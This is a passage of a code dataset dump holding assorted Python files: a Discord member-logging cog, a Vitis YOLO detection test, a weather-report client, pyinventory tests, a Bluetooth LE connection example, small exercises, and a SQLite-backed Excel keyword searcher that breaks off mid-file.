created_on = f\"{user_created} ({since_created} days ago)\"\n\n        embed = discord.Embed(\n            description=f\"{member.mention} ({member.name}#{member.discriminator})\",\n            colour=discord.Colour.green(),\n            timestamp=member.joined_at,\n        )\n        embed.add_field(name=\"Total Users:\", value=str(users))\n        embed.add_field(name=\"Account created on:\", value=created_on)\n        embed.set_footer(text=f\"User ID: {member.id}\")\n        embed.set_author(\n            name=f\"{member.name} has joined the guild\",\n            url=member.avatar_url,\n            icon_url=member.avatar_url,\n        )\n        embed.set_thumbnail(url=member.avatar_url)\n        await channel.send(embed=embed)\n\n    @commands.Cog.listener()\n    async def on_member_remove(self, member):\n        leave = await self.config.guild(member.guild).leave()\n        if not leave:\n            return\n        channel = member.guild.get_channel(await self.config.guild(member.guild).channel())\n        if not channel:\n            return\n        time = datetime.datetime.utcnow()\n        users = len(member.guild.members)\n        embed = discord.Embed(\n            description=f\"{member.mention} ({member.name}#{member.discriminator})\",\n            colour=discord.Colour.red(),\n            timestamp=time,\n        )\n        embed.add_field(name=\"Total Users:\", value=str(users))\n        embed.set_footer(text=f\"User ID: {member.id}\")\n        embed.set_author(\n            name=f\"{member.name} has left the guild\",\n            url=member.avatar_url,\n            icon_url=member.avatar_url,\n        )\n        embed.set_thumbnail(url=member.avatar_url)\n        await channel.send(embed=embed)\n","sub_path":"userlog/userlog.py","file_name":"userlog.py","file_ext":"py","file_size_in_byte":4636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"283890565","text":"if __name__ == \"__main__\":\r\n\r\n    #Importing some libraries\r\n    import numpy as np\r\n    import pandas as pd\r\n    import os\r\n    #Getting rid of pesky warnings\r\n    def warn(*args, **kwargs):\r\n        pass\r\n    import warnings\r\n    warnings.warn = warn\r\n    np.warnings.filterwarnings('ignore')\r\n\r\n    column_names = [\r\n    \t\"Age\",\r\n\t\t\"BusinessTravel\",\t\r\n\t\t\"Department\",\r\n\t\t\"DistanceFromHome\",\r\n\t\t\"Education\",\r\n\t\t\"EnvironmentSatisfaction\",\r\n\t\t\"Gender\",\r\n\t\t\"JobInvolvement\",\r\n\t\t\"JobLevel\",\r\n\t\t\"JobRole\",\r\n\t\t\"JobSatisfaction\",\r\n\t\t\"MaritalStatus\",\r\n\t\t\"MonthlyIncome\",\r\n\t\t\"NumCompaniesWorked\",\r\n\t\t\"OverTime\",\r\n\t\t\"PercentSalaryHike\",\r\n\t\t\"PerformanceRating\",\r\n\t\t\"StockOptionLevel\",\r\n\t\t\"TotalWorkingYears\",\r\n\t\t\"TrainingTimesLastYear\",\r\n\t\t\"WorkLifeBalance\",\r\n\t\t\"YearsAtCompany\",\r\n\t\t\"YearsInCurrentRole\",\r\n\t\t\"YearsSinceLastPromotion\",\r\n\t\t\"YearsWithCurrManager\"\r\n    ]\r\n    #Importing the dataset\r\n    location = 'final.csv'\r\n    dataset = pd.read_csv(location)\r\n    dataset = dataset.drop(['Unnamed: 0'],axis=1)\r\n    X=dataset.iloc[:,dataset.columns !='Attrition']\r\n    Y=dataset.iloc[:,dataset.columns =='Attrition']\r\n    \r\n    #Feature scaling\r\n    from sklearn.preprocessing import StandardScaler\r\n    sc_X = StandardScaler()\r\n    X_train = sc_X.fit_transform(X)\r\n    \r\n\r\n    #Using Pipeline\r\n    import sklearn.pipeline\r\n    \r\n    from sklearn.ensemble import RandomForestClassifier\r\n    from sklearn.decomposition import KernelPCA\r\n    from imblearn.pipeline import make_pipeline\r\n    \r\n    \r\n    clf = RandomForestClassifier()\r\n    kernel = KernelPCA()\r\n    \r\n    pipeline = make_pipeline(kernel, clf)\r\n    #Fit on the scaled features so they match the scaled user input below\r\n    pipeline.fit(X_train, Y)\r\n\r\n    #User-input\r\n    v = []\r\n    for i in column_names[:]:\r\n        v.append(input(i+\": \"))\r\n    answer = np.array(v)\r\n    answer = answer.reshape(1,-1)\r\n    answer = sc_X.transform(answer)\r\n    print (\"Predicts:\"+ str(pipeline.predict(answer)))\r\n    \r\n","sub_path":"Prediction.py","file_name":"Prediction.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"52166788","text":"#!/usr/bin/env python\n# Copyright 2019 Xilinx Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import print_function\nimport os, sys\nfrom six import itervalues, iteritems\nfrom ctypes import *\nimport numpy as np\nimport timeit\n\nfrom vai.dpuv1.rt import xdnn, xdnn_io\nfrom vai.dpuv1.rt.vitis.python.dpu.runner import Runner\nfrom vai.dpuv1.utils.postproc import yolo\nfrom yolo_utils import bias_selector, saveDetectionDarknetStyle, yolo_parser_args\nfrom yolo_utils import draw_boxes, generate_colors\nfrom get_mAP_darknet import calc_detector_mAP\n\ndef main():\n    parser = xdnn_io.default_parser_args()\n    parser = yolo_parser_args(parser)\n    args = parser.parse_args()\n    args = xdnn_io.make_dict_args(args)\n\n    # Setup the environment\n    img_paths = 
xdnn_io.getFilePaths(args['images'])\n if(args['golden'] or args['visualize']):\n assert args['labels'], \"Provide --labels to compute mAP.\"\n assert args['results_dir'], \"For accuracy measurements, provide --results_dir to save the detections.\"\n labels = xdnn_io.get_labels(args['labels'])\n colors = generate_colors(len(labels))\n\n if args['yolo_version'] == 'v2': yolo_postproc = yolo.yolov2_postproc\n elif args['yolo_version'] == 'v3': yolo_postproc = yolo.yolov3_postproc\n\n runner = Runner(args['vitis_rundir'])\n\n # Setup the blobs\n inTensors = runner.get_input_tensors()\n outTensors = runner.get_output_tensors()\n batch_sz = args['batch_sz']\n if batch_sz == -1:\n batch_sz = inTensors[0].dims[0]\n\n fpgaBlobs = []\n for io in [inTensors, outTensors]:\n blobs = []\n for t in io:\n shape = (batch_sz,) + tuple([t.dims[i] for i in range(t.ndims)][1:])\n blobs.append(np.empty((shape), dtype=np.float32, order='C'))\n fpgaBlobs.append(blobs)\n fpgaInput = fpgaBlobs[0][0]\n\n # Setup the YOLO config\n net_h, net_w = fpgaInput.shape[-2:]\n args['net_h'] = net_h\n args['net_w'] = net_w\n biases = bias_selector(args)\n\n # Setup profiling env\n prep_time = 0\n exec_time = 0\n post_time = 0\n\n # Start the execution\n for i in range(0, len(img_paths), batch_sz):\n pl = []\n img_shapes = []\n\n # Prep images\n t1 = timeit.default_timer()\n for j, p in enumerate(img_paths[i:i + batch_sz]):\n fpgaInput[j, ...], img_shape = xdnn_io.loadYoloImageBlobFromFile(p, net_h, net_w)\n pl.append(p)\n img_shapes.append(img_shape)\n t2 = timeit.default_timer()\n\n # Execute\n jid = runner.execute_async(fpgaBlobs[0], fpgaBlobs[1])\n runner.wait(jid)\n\n # Post Proc\n t3 = timeit.default_timer()\n boxes = yolo_postproc(fpgaBlobs[1], args, img_shapes, biases=biases)\n t4 = timeit.default_timer()\n\n prep_time += (t2-t1)\n exec_time += (t3-t2)\n post_time += (t4-t3)\n\n for i in range(min(batch_sz, len(img_shapes))):\n print(\"Detected {} boxes in {}\".format(len(boxes[i]), pl[i]))\n\n # Save the result\n if(args['results_dir']):\n for i in range(min(batch_sz, len(img_shapes))):\n filename = os.path.splitext(os.path.basename(pl[i]))[0]\n out_file_txt = os.path.join(args['results_dir'], filename + '.txt')\n print(\"Saving {} boxes to {}\".format(len(boxes[i]), out_file_txt)); sys.stdout.flush()\n saveDetectionDarknetStyle(out_file_txt, boxes[i], img_shapes[i])\n if(args['visualize']):\n out_file_png = os.path.join(args['results_dir'], filename + '.png')\n print(\"Saving result to {}\".format(out_file_png)); sys.stdout.flush()\n draw_boxes(pl[i], boxes[i], labels, colors, out_file_png)\n\n # Profiling results\n if(args['profile']):\n print(\"\\nAverage Latency in ms:\")\n print(\" Image Prep: {0:3f}\".format(prep_time * 1000.0 / len(img_paths)))\n print(\" Exec: {0:3f}\".format(exec_time * 1000.0 / len(img_paths)))\n print(\" Post Proc: {0:3f}\".format(post_time * 1000.0 / len(img_paths)))\n sys.stdout.flush()\n\n # mAP calculation\n if(args['golden']):\n print()\n print(\"Computing mAP score : \")\n print(\"Class names are : {} \".format(labels))\n mAP = calc_detector_mAP(args['results_dir'], args['golden'], len(labels), labels, args['prob_threshold'], args['mapiouthresh'], args['points'])\n sys.stdout.flush()\n\nif __name__ == '__main__':\n 
main()\n","sub_path":"proj/fpga/zcu106/Vitis-AI-DPU_TRD-for-ZCU106/zcu106_dpu/Vitis-AI/alveo/apps/yolo/test_detect_vitis.py","file_name":"test_detect_vitis.py","file_ext":"py","file_size_in_byte":4668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"221903883","text":"import requests\n\n\ndef main():\n choice = input(\"[R]eport weather or [s]ee reports? \")\n while choice:\n if choice.lower().strip() == 'r':\n report_event()\n elif choice.lower().strip() == 's':\n see_events()\n else:\n print(f\"Don't know what to do with {choice}.\")\n\n choice = input(\"[R]eport weather or [s]ee reports? \")\n\n\ndef report_event():\n desc = input(\"What is happening now? \")\n city = input(\"What city? \")\n\n data = {\n \"description\": desc,\n \"location\": {\n \"city\": city\n }\n }\n\n url = \"http://127.0.0.1:8000/api/reports\"\n resp = requests.post(url, json=data)\n resp.raise_for_status()\n\n result = resp.json()\n print(f\"Reported new event: {result.get('id')}\")\n\n\ndef see_events():\n url = \"http://127.0.0.1:8000/api/reports\"\n resp = requests.get(url)\n resp.raise_for_status()\n\n data = resp.json()\n for r in data:\n print(f\"{r.get('location').get('city')} has {r.get('description')}\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"part_1_Basics/06_deployment/bin/reportapp.py","file_name":"reportapp.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"511452654","text":"#!/usr/bin/env python3\n# Copyright (c) 2004-present Facebook All rights reserved.\n# Use of this source code is governed by a BSD-style\n# license that can be found in the LICENSE file.\n\n\nfrom pyinventory.api.equipment import (\n add_equipment,\n get_equipment,\n get_or_create_equipment,\n)\nfrom pyinventory.api.equipment_type import (\n add_equipment_type,\n delete_equipment_type_with_equipments,\n)\nfrom pyinventory.api.location import add_location\nfrom pyinventory.api.location_type import (\n add_location_type,\n delete_location_type_with_locations,\n)\n\nfrom .utils.base_test import BaseTest\n\n\nclass TestEquipment(BaseTest):\n def setUp(self) -> None:\n super().setUp()\n self.location_types_created = []\n self.location_types_created.append(\n add_location_type(\n self.client,\n \"City\",\n [(\"Mayor\", \"string\", None, True), (\"Contact\", \"email\", None, True)],\n )\n )\n self.equipment_types_created = []\n self.equipment_types_created.append(\n add_equipment_type(\n self.client,\n \"Tp-Link T1600G\",\n \"Router\",\n [(\"IP\", \"string\", None, True)],\n {},\n [],\n )\n )\n self.location = add_location(\n self.client,\n [(\"City\", \"Lima\")],\n {\"Mayor\": \"Bernard King\", \"Contact\": \"limacity@peru.pe\"},\n 10,\n 20,\n )\n\n def tearDown(self) -> None:\n for equipment_type in self.equipment_types_created:\n delete_equipment_type_with_equipments(self.client, equipment_type)\n for location_type in self.location_types_created:\n delete_location_type_with_locations(self.client, location_type)\n\n def test_equipment_created(self) -> None:\n\n equipment = add_equipment(\n self.client,\n \"TPLinkRouter\",\n \"Tp-Link T1600G\",\n self.location,\n {\"IP\": \"127.0.0.1\"},\n )\n fetched_equipment = get_equipment(self.client, \"TPLinkRouter\", self.location)\n self.assertEqual(equipment, fetched_equipment)\n\n def test_get_or_create_equipment(self) -> None:\n equipment = get_or_create_equipment(\n self.client,\n \"TPLinkRouter\",\n \"Tp-Link T1600G\",\n 
self.location,\n            {\"IP\": \"127.0.0.1\"},\n        )\n        equipment2 = get_or_create_equipment(\n            self.client,\n            \"TPLinkRouter\",\n            \"Tp-Link T1600G\",\n            self.location,\n            {\"IP\": \"127.0.0.1\"},\n        )\n        self.assertEqual(equipment, equipment2)\n","sub_path":"symphony/cli/tests/pyinventory_tests/test_equipment.py","file_name":"test_equipment.py","file_ext":"py","file_size_in_byte":2680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"45363653","text":"import asyncio\nfrom aioble import Device\nfrom aioble import CentralManager\n\nTEST_ADDRESS_10 = \"D7:D1:17:78:FB:D0\"\nTEST_ADDRESS_12 = \"77:6C:8E:86:6B:5A\"\n\nTEST_ADDRESS_5 = \"D4:D2:34:E3:BC:C5\"\nTEST_NOTIFY_CHARACTERISTIC = \"ee840202-43b7-4f65-9fb9-d7b92d683e36\"\nTEST_WRITE_CHARACTERISTIC = \"ee840203-43b7-4f65-9fb9-d7b92d683e36\"\n\nTEST_READ_CHAR = \"00002902-0000-1000-8000-00805f9b34fb\"\n\nTIMEOUT_SEC = 5\n\nconfig = [100, 0, 100, 0, 200, 0, 56, 255, 200, 0, 56, 255, 0]\nWRITE_CHAR_TEST = bytearray(config)\n\nd_10_device = None\nd_5_device = None\n\n\ndef notify_callback_10(sender, data):\n    values = int.from_bytes(data, byteorder=\"little\", signed=True)\n    print(f\"10: {sender}: {values}\")\n\n\ndef notify_callback_5(sender, data):\n    values = int.from_bytes(data, byteorder=\"little\", signed=True)\n    print(f\"5: {sender}: {values}\")\n\n\ndef scan_callback_10(device, device_address, device_name):\n    global d_10_device\n    print(\n        \"device: {0} device_address: {1} device_name: {2}\".format(\n            device, device_address, device_name\n        )\n    )\n    if device_address == TEST_ADDRESS_10:\n        d_10_device = device\n\n\ndef scan_callback_all(device, device_address, device_name):\n    global d_10_device\n    global d_5_device\n    print(\n        \"device: {0} device_address: {1} device_name: {2}\".format(\n            device, device_address, device_name\n        )\n    )\n    if device_address == TEST_ADDRESS_10:\n        d_10_device = device\n    if device_address == TEST_ADDRESS_5:\n        d_5_device = device\n\n\ndef connect_callback_10():\n    print(\"Connection to Device 10 Succeeded\")\n\n\ndef disconnect_callback_10(address):\n    print(\n        \"Disconnection From Device 10 Succeeded, address: {0}\".format(address)\n    )\n\n\ndef services_resolved_10():\n    print(\"Services Resolved for Device 10\")\n\n\ndef connect_callback_5():\n    print(\"Connection to Device 5 Succeeded\")\n\n\ndef disconnect_callback_5(address):\n    print(\n        \"Disconnection From Device 5 Succeeded, address: {0}\".format(address)\n    )\n\n\ndef services_resolved_5():\n    print(\"Services Resolved for Device 5\")\n\n\nasync def connect_one():\n    try:\n        # Find Device\n        cm_10 = CentralManager()\n        await cm_10.start_scan(scan_callback_10)\n\n        while d_10_device is None:\n            await asyncio.sleep(0.1)\n\n        await cm_10.stop_scan()\n\n        # Create Device\n        d_10 = Device(d_10_device)\n\n        d_10.connect_succeeded = connect_callback_10\n        d_10.disconnect_succeeded = disconnect_callback_10\n        d_10.services_resolved = services_resolved_10\n\n        print(\"Connecting\")\n\n        try:\n            await asyncio.wait_for(d_10.connect(), TIMEOUT_SEC)\n        except asyncio.TimeoutError:\n            raise Exception(\"Device was not found.\")\n\n        is_d_10 = await d_10.is_connected()\n        print(f\"Connected_10: {is_d_10}\")\n\n        print(\"Writing Char\")\n        await d_10.write_char(TEST_WRITE_CHARACTERISTIC, WRITE_CHAR_TEST)\n\n        print(\"Reading Descriptor\")\n        print(await d_10.read_descriptor(TEST_NOTIFY_CHARACTERISTIC))\n\n        print(\"Starting Notify\")\n        await d_10.start_notify(TEST_NOTIFY_CHARACTERISTIC, notify_callback_10)\n\n        await 
asyncio.sleep(2)\n\n        print(\"Stopping Notify\")\n        await d_10.stop_notify(TEST_NOTIFY_CHARACTERISTIC)\n\n        print(\"Disconnecting\")\n        await d_10.disconnect()\n\n        is_d_10 = await d_10.is_connected()\n        print(f\"Connected_10: {is_d_10}\")\n\n    except Exception as ex:\n        print(f\"Exception, Failed to Connect: {ex}\")\n\n\nasync def connect_two():\n    try:\n        # Find Devices\n        cm_all = CentralManager()\n        await cm_all.start_scan(scan_callback_all)\n\n        while d_10_device is None or d_5_device is None:\n            await asyncio.sleep(0.1)\n\n        await cm_all.stop_scan()\n\n        print(d_10_device)\n        print(d_5_device)\n\n        # Create Devices\n        d_10 = Device(d_10_device)\n        d_5 = Device(d_5_device)\n\n        d_10.connect_succeeded = connect_callback_10\n        d_10.disconnect_succeeded = disconnect_callback_10\n        d_10.services_resolved = services_resolved_10\n\n        d_5.connect_succeeded = connect_callback_5\n        d_5.disconnect_succeeded = disconnect_callback_5\n        d_5.services_resolved = services_resolved_5\n\n        print(\"Connecting\")\n        tasks = [d_10.connect(), d_5.connect()]\n        done, pending = await asyncio.wait(\n            tasks, timeout=TIMEOUT_SEC, return_when=asyncio.ALL_COMPLETED\n        )\n\n        if pending:\n            raise Exception(\"Could not connect to both devices.\")\n\n        is_d_10 = await d_10.is_connected()\n        is_d_5 = await d_5.is_connected()\n        print(f\"Connected_10: {is_d_10} Connected_5: {is_d_5}\")\n\n        print(\"Writing Char\")\n        await d_10.write_char(TEST_WRITE_CHARACTERISTIC, WRITE_CHAR_TEST)\n        await d_5.write_char(TEST_WRITE_CHARACTERISTIC, WRITE_CHAR_TEST)\n\n        print(\"Reading Char\")\n        print(await d_10.read_char(TEST_WRITE_CHARACTERISTIC))\n        print(await d_5.read_char(TEST_WRITE_CHARACTERISTIC))\n\n        print(\"Starting Notify\")\n        await d_5.start_notify(TEST_NOTIFY_CHARACTERISTIC, notify_callback_5)\n        await d_10.start_notify(TEST_NOTIFY_CHARACTERISTIC, notify_callback_10)\n\n        await asyncio.sleep(5)\n\n        print(\"Stopping Notify\")\n        await d_5.stop_notify(TEST_NOTIFY_CHARACTERISTIC)\n        await d_10.stop_notify(TEST_NOTIFY_CHARACTERISTIC)\n\n        print(\"Disconnecting\")\n        await d_10.disconnect()\n        await d_5.disconnect()\n\n        is_d_10 = await d_10.is_connected()\n        is_d_5 = await d_5.is_connected()\n        print(f\"Connected_10: {is_d_10} Connected_5: {is_d_5}\")\n\n    except Exception as ex:\n        print(f\"Exception, Failed to Connect: {ex}\")\n\n\nloop = asyncio.get_event_loop()\nloop.run_until_complete(connect_one())\n","sub_path":"examples/connect.py","file_name":"connect.py","file_ext":"py","file_size_in_byte":5891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"105242282","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Feb 21 23:16:09 2019\r\n\r\n@author: mahtab faraji\r\nwww.onlinebme.com\r\n\"\"\"\r\n#Write a program that accepts a comma separated sequence of words as input and prints the words in a comma-separated sequence after sorting them alphabetically.\r\n#Suppose the following input is supplied to the program:\r\n#without,hello,bag,world\r\n#Then, the output should be:\r\n#bag,hello,without,world\r\n\r\nx=input('Enter comma separated words: ')\r\nmy_list=x.split(',')\r\nsort_list=sorted(my_list)\r\nnew_str=','.join(sort_list)\r\nprint(new_str)\r\n","sub_path":"project8.py","file_name":"project8.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"423491507","text":"'''\n3.\nCreate a Card class with a charge feature, a spend feature, and a feature that reports the balance.\n- charge feature (charge)\n- spend feature (consume)\n- a 20% discount rate applies when the card is used at the cinema\nprint feature (print) # The balance is ( ) won.\n\nTest code\n<input>\ncard = Card()\ncard.charge(20000)\ncard.consume(3000,'mart')\ncard.consume(10000,'cinema')\ncard.consume(13000,'mart')\ncard.print()\n\n<output>\nThe balance is 20000 won.\nSpent 3000 won at the mart.\nSpent 8000 won at the cinema.\nInsufficient balance.\nThe balance is 9000 won.\n'''\n\n\nclass Card:\n    def __init__(self):\n        self.money = 0\n\n    def charge(self, num):\n        self.money += num\n\n    def consume(self, num, x):\n\n        if x == 'cinema':\n            if self.money - num * 0.8 < 0:\n                print(\"Insufficient balance.\")\n\n            else:\n                self.money -= num * 0.8\n                print(\"Spent {:.0f} won at the {}.\".format(num * 0.8, x))\n\n        else:\n            if self.money - num < 0:\n                print(\"Insufficient balance.\")\n\n            else:\n                self.money -= num\n                print(\"Spent {:.0f} won at the {}.\".format(num, x))\n\n    def print(self):\n        print('The balance is {:.0f} won.'.format(self.money))\n\n\ncard = Card()\ncard.charge(20000)\ncard.print()\ncard.consume(3000, 'mart')\ncard.consume(10000, 'cinema')\ncard.consume(13000, 'mart')\ncard.print()\n","sub_path":"quiz/quiz2_3.py","file_name":"quiz2_3.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"271747651","text":"import os\nimport re\nimport sqlite3\nfrom sys import getfilesystemencoding\nfrom datetime import datetime\nfrom random import randint\nfrom time import sleep\n\n#Third Party\nfrom tqdm import tqdm\nimport xlrd\nfrom xlrd.sheet import ctype_text\n\nclass DatabaseManager:\n    def __init__(self, working_dir):\n        self.working_dir = working_dir\n        self.output_dir = os.path.join(self.working_dir, \"Output\")\n        self.db = os.path.join(self.working_dir, \"ExcavationPack.db\")\n        self.log_file = os.path.join(self.output_dir, \"log_excel.txt\")\n        self.system_encoding = getfilesystemencoding()\n\n    def check_database(self):\n        \"\"\"\n        Checks multiple times to see if the database exists or not\n        Exits the script if it does not exist\n        Currently does a file check, will need some other method\n        if a remote database is used\n        \"\"\"\n        attempts = 0\n        while attempts < 3:\n            try:\n                if os.path.isfile(self.db):\n                    with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n                        log_file.write(\"[{} Success]Database exists.\".format(self.check_database.__name__))\n                        log_file.write('\\n')\n                    return self.db\n                else:\n                    attempts += 1\n                    with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n                        log_file.write(\"[{} Failed]Database does not exist\".format(self.check_database.__name__))\n                        log_file.write('\\n')\n                    sleep(10)\n\n            except Exception as e:\n                with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n                    log_file.write(\"[{} Failed]{}\".format(self.check_database.__name__, str(e)))\n                    log_file.write('\\n')\n                return False\n        \n        return False\n\nclass SearcherExcelLegacy:\n\n    def __init__(self, working_dir, database):\n        self.working_dir = working_dir\n        self.output_dir = os.path.join(self.working_dir, \"Output\")\n        self.results_dir = os.path.join(self.output_dir, \"Results\") # Directory to place results\n        self.log_file = os.path.join(self.output_dir, \"log_excel_legacy.txt\")\n        self.system_encoding = getfilesystemencoding()\n        self.db = database\n        self.keywords_file = os.path.join(self.working_dir, \"keywords.txt\") # File containing the keywords which will be searched for\n        self.keywords = set()\n        with open(self.keywords_file) as file:\n            for line in file:\n                self.keywords.add(line.strip())\n\n    def _load_values(self):\n        attempts = 0\n        while attempts < 3:\n            try:\n                # States\n                self.categorizing = self._sql_select_state_category(\"Categorizing\")\n                self.categorized = 
self._sql_select_state_category(\"Categorized\")\n                self.processing = self._sql_select_state_category(\"Processing\")\n                self.processed = self._sql_select_state_category(\"Processed\")\n                self.error = self._sql_select_state_category(\"Error\")\n\n                # Data Categories\n                self.gzip = self._sql_select_data_category(\"Gzip\")\n                self.excel = self._sql_select_data_category(\"Excel\")\n                self.excellegacy = self._sql_select_data_category(\"ExcelLegacy\")\n                self.pdf = self._sql_select_data_category(\"Pdf\")\n                self.plaintext = self._sql_select_data_category(\"Plaintext\")\n                self.word = self._sql_select_data_category(\"Word\")\n                self.notsupported = self._sql_select_data_category(\"NotSupported\")\n                self.notdetermined = self._sql_select_data_category(\"NotDetermined\")\n                self.duplicate = self._sql_select_data_category(\"Duplicate\")\n                self.data_error = self._sql_select_data_category(\"Error\")\n                with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n                    log_file.write(\"[{} Success] Loaded all values.\".format(self._load_values.__name__))\n                    log_file.write('\\n')\n                return True\n            except Exception as e:\n                attempts += 1\n                # Keep the message; `e` goes out of scope once the except block ends.\n                last_error = str(e)\n                with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n                    log_file.write(\"[{} Failed] Attempting to load again.{}\".format(self._load_values.__name__, last_error))\n                    log_file.write('\\n')\n                sleep(20)\n        \n        if attempts == 3:\n            with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n                log_file.write(\"[{} Failed] All attempts to load have failed. --- {}\".format(self._load_values.__name__, last_error))\n                log_file.write('\\n')\n            return False\n\n    def _sql_select_ready(self, DataCategoryID, StateID):\n        \"\"\"\n        Selects and returns the FileName and FileHash from the database for all files with a certain state. \n        \"\"\"\n        try:\n            # Connect to database\n            conn = sqlite3.connect(self.db)\n            cursor = conn.cursor()\n            # Data to Select\n            sql = f\"\"\"\n            SELECT categorization.FileHash, categorization.FileName\n            FROM categorization\n            INNER JOIN state\n            ON categorization.FileHash = state.FileHash\n            where DataCategoryID = {DataCategoryID}\n            AND StateID = {StateID}\n            ORDER BY RANDOM()\n            ;\n            \"\"\"\n            cursor.execute(sql)\n            files = cursor.fetchall()\n            conn.close()\n            # Returning Filename and FileHash\n            with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n                log_file.write(\"[{} Success]\".format(self._sql_select_ready.__name__))\n                log_file.write('\\n')\n            return files\n        except Exception as e:\n            with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n                log_file.write(\"[{} Failed]{}\".format(self._sql_select_ready.__name__, str(e)))\n                log_file.write('\\n')\n            return False\n\n    def _sql_select_data_category(self, DataCategory):\n        \"\"\"\n        Used to check the state of the data\n        \"\"\"\n        try:\n            # Connect to database\n            conn = sqlite3.connect(self.db)\n            cursor = conn.cursor()\n            # Data to Select\n            sql = f\"\"\"SELECT ID FROM data_categories WHERE DataCategory = \"{DataCategory}\";\"\"\"\n            cursor.execute(sql)\n            data_id = cursor.fetchall()\n            conn.close()\n            # Returning Filename and FileHash\n            with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n                log_file.write(\"[{} Success]\".format(self._sql_select_data_category.__name__))\n                log_file.write('\\n')\n            return data_id[0][0]\n        except Exception as e:\n            with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n                log_file.write(\"[{} Failed]{}\".format(self._sql_select_data_category.__name__, str(e)))\n                log_file.write('\\n')\n            return False\n\n    def 
_sql_select_state_category(self, StateCategory):\n \"\"\"\n Used to check the state of the data\n \"\"\"\n try:\n # Connect to database\n conn = sqlite3.connect(self.db)\n cursor = conn.cursor()\n # Data to Select\n sql = f\"\"\"SELECT ID FROM state_categories WHERE StateCategory = \"{StateCategory}\";\"\"\"\n cursor.execute(sql)\n state_id = cursor.fetchall()\n conn.close()\n # Returning Filename and FileHash\n with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n log_file.write(\"[{} Success]\".format(self._sql_select_state_category.__name__))\n log_file.write('\\n')\n return state_id[0][0]\n except Exception as e:\n with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n log_file.write(\"[{} Failed]{}\".format(self._sql_select_state_category.__name__, str(e)))\n log_file.write('\\n')\n return False\n\n def _sql_select_state(self, FileHash):\n \"\"\"\n Used to check the state of the data.\n If found, returns the state, otherwise an empty list.\n \"\"\"\n try:\n # Connect to database\n conn = sqlite3.connect(self.db)\n cursor = conn.cursor()\n # Data to Select\n sql = f\"\"\"SELECT StateID FROM state WHERE FileHash = \"{FileHash}\";\"\"\"\n cursor.execute(sql)\n state = cursor.fetchall()\n conn.close()\n # Returning Filename and FileHash\n with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n log_file.write(\"[{} Success]\".format(self._sql_select_state.__name__))\n log_file.write('\\n')\n if state:\n state = state[0][0]\n return state\n except Exception as e:\n with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n log_file.write(\"[{} Failed]{}\".format(self._sql_select_state.__name__, str(e)))\n log_file.write('\\n')\n return False\n\n def _sql_select_processing_status(self):\n try:\n # Connect to database\n conn = sqlite3.connect(self.db)\n cursor = conn.cursor()\n # Data to Select\n sql = f\"\"\"SELECT * FROM state WHERE StateId = {self.processing};\"\"\"\n cursor.execute(sql)\n state = cursor.fetchall()\n conn.close()\n # Returning Filename and FileHash\n with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n log_file.write(\"[{} Success]\".format(self._sql_select_processing_status.__name__))\n log_file.write('\\n')\n if state:\n state = state[0][0]\n return state\n except Exception as e:\n with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n log_file.write(\"[{} Failed]{}\".format(self._sql_select_processing_status.__name__, str(e)))\n log_file.write('\\n')\n return False\n\n def _sql_select_load_status(self):\n \"\"\"\n Used to check the state of completion for the data categorizer\n \"\"\"\n try:\n # Connect to database\n conn = sqlite3.connect(self.db)\n cursor = conn.cursor()\n # Data to Select\n sql = f\"\"\"SELECT AllLoaded FROM load_status WHERE AllLoaded = 0;\"\"\"\n cursor.execute(sql)\n state = cursor.fetchall()\n conn.close()\n # Returning Filename and FileHash\n with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n log_file.write(\"[{} Success]\".format(self._sql_select_load_status.__name__))\n log_file.write('\\n')\n if state:\n state = state[0][0]\n return state\n except Exception as e:\n with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n log_file.write(\"[{} Failed]{}\".format(self._sql_select_load_status.__name__, str(e)))\n log_file.write('\\n')\n return False\n\n def _sql_select_all_category(self, DataCategoryID):\n \"\"\"\n Selects and returns the FileName and FileHash from the database for 
